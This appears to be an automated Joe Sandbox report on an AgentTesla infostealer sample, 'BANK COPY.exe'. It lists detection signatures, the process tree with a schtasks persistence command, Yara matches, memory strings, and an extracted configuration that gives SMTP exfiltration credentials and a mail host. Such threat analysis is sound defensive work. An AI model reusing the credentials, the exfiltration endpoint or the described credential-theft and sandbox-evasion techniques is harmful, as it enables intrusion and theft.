Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BANK COPY.exe

Overview

General Information

Sample Name:BANK COPY.exe
Analysis ID:680551
MD5:0197c423eddeb8a0ed293e96a152f5a2
SHA1:068261f9991202b0a75d813f0c25267d28e4fb51
SHA256:54877cf2e0d27d13a5e94fcfb0eae5749bfc56e0e2f548f6410e6e4d56f3ea3f
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BANK COPY.exe (PID: 5724 cmdline: "C:\Users\user\Desktop\BANK COPY.exe" MD5: 0197C423EDDEB8A0ED293E96A152F5A2)
    • schtasks.exe (PID: 5308 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gPxsznxm" /XML "C:\Users\user\AppData\Local\Temp\tmp1205.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 4692 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • yqWDN.exe (PID: 4264 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • yqWDN.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "emin.gasimov@absheron-sharab.az", "Password": "emin077", "Host": "mail.absheron-sharab.az"}
SourceRuleDescriptionAuthorStrings
00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x3017e:$a13: get_DnsResolver
      • 0x2e978:$a20: get_LastAccessed
      • 0x30afc:$a27: set_InternalServerPort
      • 0x30e18:$a30: set_GuidMasterKey
      • 0x2ea7f:$a33: get_Clipboard
      • 0x2ea8d:$a34: get_Keyboard
      • 0x2fd96:$a35: get_ShiftKeyDown
      • 0x2fda7:$a36: get_AltKeyDown
      • 0x2ea9a:$a37: get_Password
      • 0x2f546:$a38: get_PasswordHash
      • 0x3057e:$a39: get_DefaultCredentials
      00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          0.2.BANK COPY.exe.3d1e9d8.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.BANK COPY.exe.3d1e9d8.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              7.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                7.0.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  7.0.RegSvcs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                  • 0x32c58:$s10: logins
                  • 0x326bf:$s11: credential
                  • 0x2ec7f:$g1: get_Clipboard
                  • 0x2ec8d:$g2: get_Keyboard
                  • 0x2ec9a:$g3: get_Password
                  • 0x2ff86:$g4: get_CtrlKeyDown
                  • 0x2ff96:$g5: get_ShiftKeyDown
                  • 0x2ffa7:$g6: get_AltKeyDown
                  Click to see the 8 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: BANK COPY.exeVirustotal: Detection: 54%Perma Link
                  Source: BANK COPY.exeReversingLabs: Detection: 39%
                  Source: BANK COPY.exeAvira: detected
                  Source: C:\Users\user\AppData\Roaming\gPxsznxm.exeAvira: detection malicious, Label: HEUR/AGEN.1235476
                  Source: C:\Users\user\AppData\Roaming\gPxsznxm.exeReversingLabs: Detection: 39%
                  Source: BANK COPY.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\gPxsznxm.exeJoe Sandbox ML: detected
                  Source: 7.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "emin.gasimov@absheron-sharab.az", "Password": "emin077", "Host": "mail.absheron-sharab.az"}
                  Source: BANK COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: BANK COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: RegSvcs.pdb, source: yqWDN.exe, 0000000E.00000000.307818676.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, yqWDN.exe.7.dr
                  Source: Binary string: RegSvcs.pdb source: yqWDN.exe, 0000000E.00000000.307818676.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, yqWDN.exe.7.dr
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_080244B8
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_080244A8
                  Source: C:\Users\user\Desktop\BANK COPY.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_0802456C
                  Source: Joe Sandbox ViewIP Address: 162.241.217.198 162.241.217.198
                  Source: global trafficTCP traffic: 192.168.2.3:49752 -> 162.241.217.198:587
                  Source: global trafficTCP traffic: 192.168.2.3:49752 -> 162.241.217.198:587
                  Source: RegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: RegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://CqUOsT.com
                  Source: RegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: RegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lzmd6XB2MFu.net
                  Source: RegSvcs.exe, 00000007.00000002.517926898.000000000353A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.absheron-sharab.az
                  Source: BANK COPY.exe, 00000000.00000002.284491796.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: BANK COPY.exe, 00000000.00000003.254135945.0000000005B75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: BANK COPY.exe, 00000000.00000003.246868723.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.247238905.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.247092273.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
                  Source: BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249860644.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/
                  Source: BANK COPY.exe, 00000000.00000003.250261634.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.251054745.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250645734.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.251128359.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250676479.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/de
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: BANK COPY.exe, 00000000.00000003.250092163.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com;z
                  Source: BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249860644.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsFny
                  Source: BANK COPY.exe, 00000000.00000002.297152512.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.282184712.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comany
                  Source: BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comedta
                  Source: BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249860644.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessed
                  Source: BANK COPY.exe, 00000000.00000002.297152512.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.282184712.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgritogy
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comitu
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comouyn
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueed
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242252206.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242276187.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242269007.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: BANK COPY.exe, 00000000.00000003.242276187.0000000005B84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com-uH
                  Source: BANK COPY.exe, 00000000.00000003.242308012.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comY
                  Source: BANK COPY.exe, 00000000.00000003.242234514.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comcY
                  Source: BANK COPY.exe, 00000000.00000003.242351755.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242269007.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242234514.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242308012.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comick
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.245247770.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.245400300.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.244727394.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.245237254.0000000005B64000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.244817743.0000000005B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: BANK COPY.exe, 00000000.00000003.245237254.0000000005B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: BANK COPY.exe, 00000000.00000003.244727394.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-p
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: BANK COPY.exe, 00000000.00000003.253812232.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.253923382.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.253743728.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.253982107.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242051970.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242292859.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242252206.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242276187.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242005445.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241973593.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242191863.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242028008.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241943884.0000000005B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: BANK COPY.exe, 00000000.00000003.242005445.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241973593.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242028008.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241943884.0000000005B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coma-dt
                  Source: BANK COPY.exe, 00000000.00000003.242051970.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242330356.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242361494.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242252206.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241973593.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241943884.0000000005B7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coms
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.243969163.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: BANK COPY.exe, 00000000.00000003.243969163.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr0t
                  Source: BANK COPY.exe, 00000000.00000003.243969163.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krK
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242721047.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242814661.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: BANK COPY.exe, 00000000.00000003.242764767.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242745354.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comP
                  Source: BANK COPY.exe, 00000000.00000003.242764767.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comk
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deF
                  Source: BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.dec
                  Source: BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: RegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                  Source: unknownDNS traffic detected: queries for: mail.absheron-sharab.az
                  Source: BANK COPY.exe, 00000000.00000002.282858977.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  System Summary

                  barindex
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.BANK COPY.exe.2c36370.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                  Source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: BANK COPY.exe PID: 5724, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 4692, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBA0C495Cu002dB6A6u002d4174u002d8102u002d6CC97287D619u007d/u0037EDAF7E5u002dACABu002d4CCFu002dA998u002d63BF57EC015A.csLarge array initialization: .cctor: array initializer size 11625
                  Source: BANK COPY.exe, AddCompanyForm.csLong String: Length: 20037
                  Source: gPxsznxm.exe.0.dr, AddCompanyForm.csLong String: Length: 20037
                  Source: 0.0.BANK COPY.exe.780000.0.unpack, AddCompanyForm.csLong String: Length: 20037
                  Source: BANK COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.BANK COPY.exe.3d1e9d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.BANK COPY.exe.2c36370.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
